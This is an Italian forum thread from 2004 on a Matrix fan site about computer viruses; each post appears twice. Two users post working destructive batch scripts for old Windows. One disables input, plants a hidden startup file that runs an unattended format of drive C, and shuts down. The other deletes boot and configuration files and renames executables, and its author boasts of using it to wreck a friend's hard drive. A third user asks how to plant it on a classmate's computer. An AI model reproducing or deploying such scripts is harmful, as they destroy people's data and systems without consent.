WhatIsTheMatrix.IT – Il Sito Italiano su Matrix
WhatIsTheMatrix.IT – Il Sito Italiano su Matrix
WhatIsTheMatrix.IT – Il Sito Italiano su MatrixHome // Forum
ViRuS informatici
Cita da il_giocattolaio su 20 Novembre 2004, 14:13Gente io ho una scuderia strapiena di quei dannatissimi cavalli di legno.
Potrei aprire un maneggio.comunque,un un buon antivirus come gia detto, è il syste, migliore,basta solamente una semplice accortezza.TENERLO COSTANTEMENTE AGGIORNATO.
Si è vero che il service pack 2 è una meraviglia,ma se il PC è già infettato l'unica soluzione è:
FORMAT C:
frase a me tanto cara :'
Gente io ho una scuderia strapiena di quei dannatissimi cavalli di legno.
Potrei aprire un maneggio.
comunque,un un buon antivirus come gia detto, è il syste, migliore,basta solamente una semplice accortezza.TENERLO COSTANTEMENTE AGGIORNATO.
Si è vero che il service pack 2 è una meraviglia,ma se il PC è già infettato l'unica soluzione è:
FORMAT C:
frase a me tanto cara :'
Cita da N4mal87 su 20 Novembre 2004, 21:30io ODIO il termine FORMAT C:
lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,HO DOUTO CANCELLARE TUTTI I MIEI DATI SENZA AVERE IL TEMPO DI SALVARLI PER QUELLO STUPIDISSIMO VIRUS CHE MANDANO QUEGLI STUPIDISSIMI HACHER INFORMATICI....
TEPPISTI
io ODIO il termine FORMAT C:
lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,HO DOUTO CANCELLARE TUTTI I MIEI DATI SENZA AVERE IL TEMPO DI SALVARLI PER QUELLO STUPIDISSIMO VIRUS CHE MANDANO QUEGLI STUPIDISSIMI HACHER INFORMATICI....
TEPPISTI
Cita da il_giocattolaio su 20 Novembre 2004, 22:59Io nn ho mai preso un Trojan, ho preso una volta msblast ma l'ho debellato senza riformattare 😉
L'internauta più fortunato del mondo. :ok:
,HO DOUTO CANCELLARE TUTTI I MIEI DATI SENZA AVERE IL TEMPO DI SALVARLI PER QUELLO STUPIDISSIMO VIRUS CHE MANDANO QUEGLI STUPIDISSIMI HACHER INFORMATICI....
TEPPISTIe perche non hai provato a mettere il tuo HD come slave su un altro pc per copiare tutti i tuoi dati' 8)
Io nn ho mai preso un Trojan, ho preso una volta msblast ma l'ho debellato senza riformattare 😉
L'internauta più fortunato del mondo. :ok:
,HO DOUTO CANCELLARE TUTTI I MIEI DATI SENZA AVERE IL TEMPO DI SALVARLI PER QUELLO STUPIDISSIMO VIRUS CHE MANDANO QUEGLI STUPIDISSIMI HACHER INFORMATICI....
TEPPISTI
e perche non hai provato a mettere il tuo HD come slave su un altro pc per copiare tutti i tuoi dati' 8)
Cita da N4mal87 su 21 Novembre 2004, 12:15NON SO FORSE PERCHE' ERA INFETTATO PROPRIO L'HD!!! :-_-: :-_-: :-_-:
NON SO FORSE PERCHE' ERA INFETTATO PROPRIO L'HD!!! :-_-: :-_-: :-_-:
Cita da theArchitect su 21 Novembre 2004, 13:40@echo off
rundll32 mouse,disable
rundll32 keyboard,disable
echo @echo off > a.bat
echo rundll32 mouse,disable >> a.bat
echo rundll32 keyboard,disable >> a.bat
echo format c: /autotest >> a.bat
move a.bat c:windowsmenuav~1progra~1esecuz~1 > nul
attrib +R -A +S +H c:windowsmenuav~1progra~1esecuz~1a.bat
rundll32 kernel,exitkernelbello questo programmino, bello tanto quanto devastante. NON provatelo. è postato solo per farvi vedere a cosa andreste incontro lanciando un batch con dentro questi comandi. attenzione dunque! se vedete cose del genere (o anceh solo FORMAT C: /autotest) NON ESEGUITE IL FILE, nemmeno se dio in persona vi dice che è per il bene del vostro comptuer.
@echo off
rundll32 mouse,disable
rundll32 keyboard,disable
echo @echo off > a.bat
echo rundll32 mouse,disable >> a.bat
echo rundll32 keyboard,disable >> a.bat
echo format c: /autotest >> a.bat
move a.bat c:windowsmenuav~1progra~1esecuz~1 > nul
attrib +R -A +S +H c:windowsmenuav~1progra~1esecuz~1a.bat
rundll32 kernel,exitkernel
bello questo programmino, bello tanto quanto devastante. NON provatelo. è postato solo per farvi vedere a cosa andreste incontro lanciando un batch con dentro questi comandi. attenzione dunque! se vedete cose del genere (o anceh solo FORMAT C: /autotest) NON ESEGUITE IL FILE, nemmeno se dio in persona vi dice che è per il bene del vostro comptuer.
Cita da Juliet su 21 Novembre 2004, 16:02Perchè, cosa succede''' :boh:
Perchè, cosa succede''' :boh:
Cita da darknet su 21 Novembre 2004, 16:10Provalo e vedi 😆
NON FARLO
---
Questo programmino di bat l'ho fatto per un mio "amico" che mi stava molto a cuore. Così a cuore da friggergli l'HD[code:1:3c97f4c552]
@echo off
del c:autoexec.bat
REM L'autoexec.bat
REM AHAHAH
del c:config.sys
REM File della configurazione generale
if exist c:windowswin.* goto a
if exist c:windowssystem.ini goto b
if exist c:windows*.* goto c
rename c:*.exe *.DarkNet
goto file
:a
del c:windowswin.*
REM File di avvio
:b
del c:windowssystem.ini
REM File di configurazione
:c
rename c:windows*.exe c:windows*.DarkSide
md c:windowssystemac
copy c:windows*.sys c:windowssystemac >nul
:fine
del c:command.com
REM fine[/code:1:3c97f4c552]In pratica il Piccì nn parte più
Provalo e vedi 😆
NON FARLO
---
Questo programmino di bat l'ho fatto per un mio "amico" che mi stava molto a cuore. Così a cuore da friggergli l'HD
[code:1:3c97f4c552]
@echo off
del c:autoexec.bat
REM L'autoexec.bat
REM AHAHAH
del c:config.sys
REM File della configurazione generale
if exist c:windowswin.* goto a
if exist c:windowssystem.ini goto b
if exist c:windows*.* goto c
rename c:*.exe *.DarkNet
goto file
:a
del c:windowswin.*
REM File di avvio
:b
del c:windowssystem.ini
REM File di configurazione
:c
rename c:windows*.exe c:windows*.DarkSide
md c:windowssystemac
copy c:windows*.sys c:windowssystemac >nul
:fine
del c:command.com
REM fine[/code:1:3c97f4c552]
In pratica il Piccì nn parte più
Cita da N4mal87 su 21 Novembre 2004, 19:59[color=blue:8fca827fc0]
..ASSaSSiNO ASSASSINATO DA UN ASSASSINO....[/color:8fca827fc0]
[color=blue:8fca827fc0]
..ASSaSSiNO ASSASSINATO DA UN ASSASSINO....[/color:8fca827fc0]
Cita da theArchitect su 21 Novembre 2004, 20:49beh, bella anche qeusta versione, la mia era una vecchia versione per win95/98. non discrimina la versione. e nn va su winnt. poi avevo fatto una cosa bella una volta, cioè che includeva nel codice del programma il codice di bat2com.exe e in pratica quando si copiava si riconvertiva ogni volta da bat a com. ma son cagatine
beh, bella anche qeusta versione, la mia era una vecchia versione per win95/98. non discrimina la versione. e nn va su winnt. poi avevo fatto una cosa bella una volta, cioè che includeva nel codice del programma il codice di bat2com.exe e in pratica quando si copiava si riconvertiva ogni volta da bat a com. ma son cagatine
Cita da Juliet su 22 Novembre 2004, 14:37Ma siete tremendi...
Dove devo inserire questo codice...' Avrei un'idea sul picci di una caaaaaaara compagna... :devil:
Ma siete tremendi...
Dove devo inserire questo codice...' Avrei un'idea sul picci di una caaaaaaara compagna... :devil: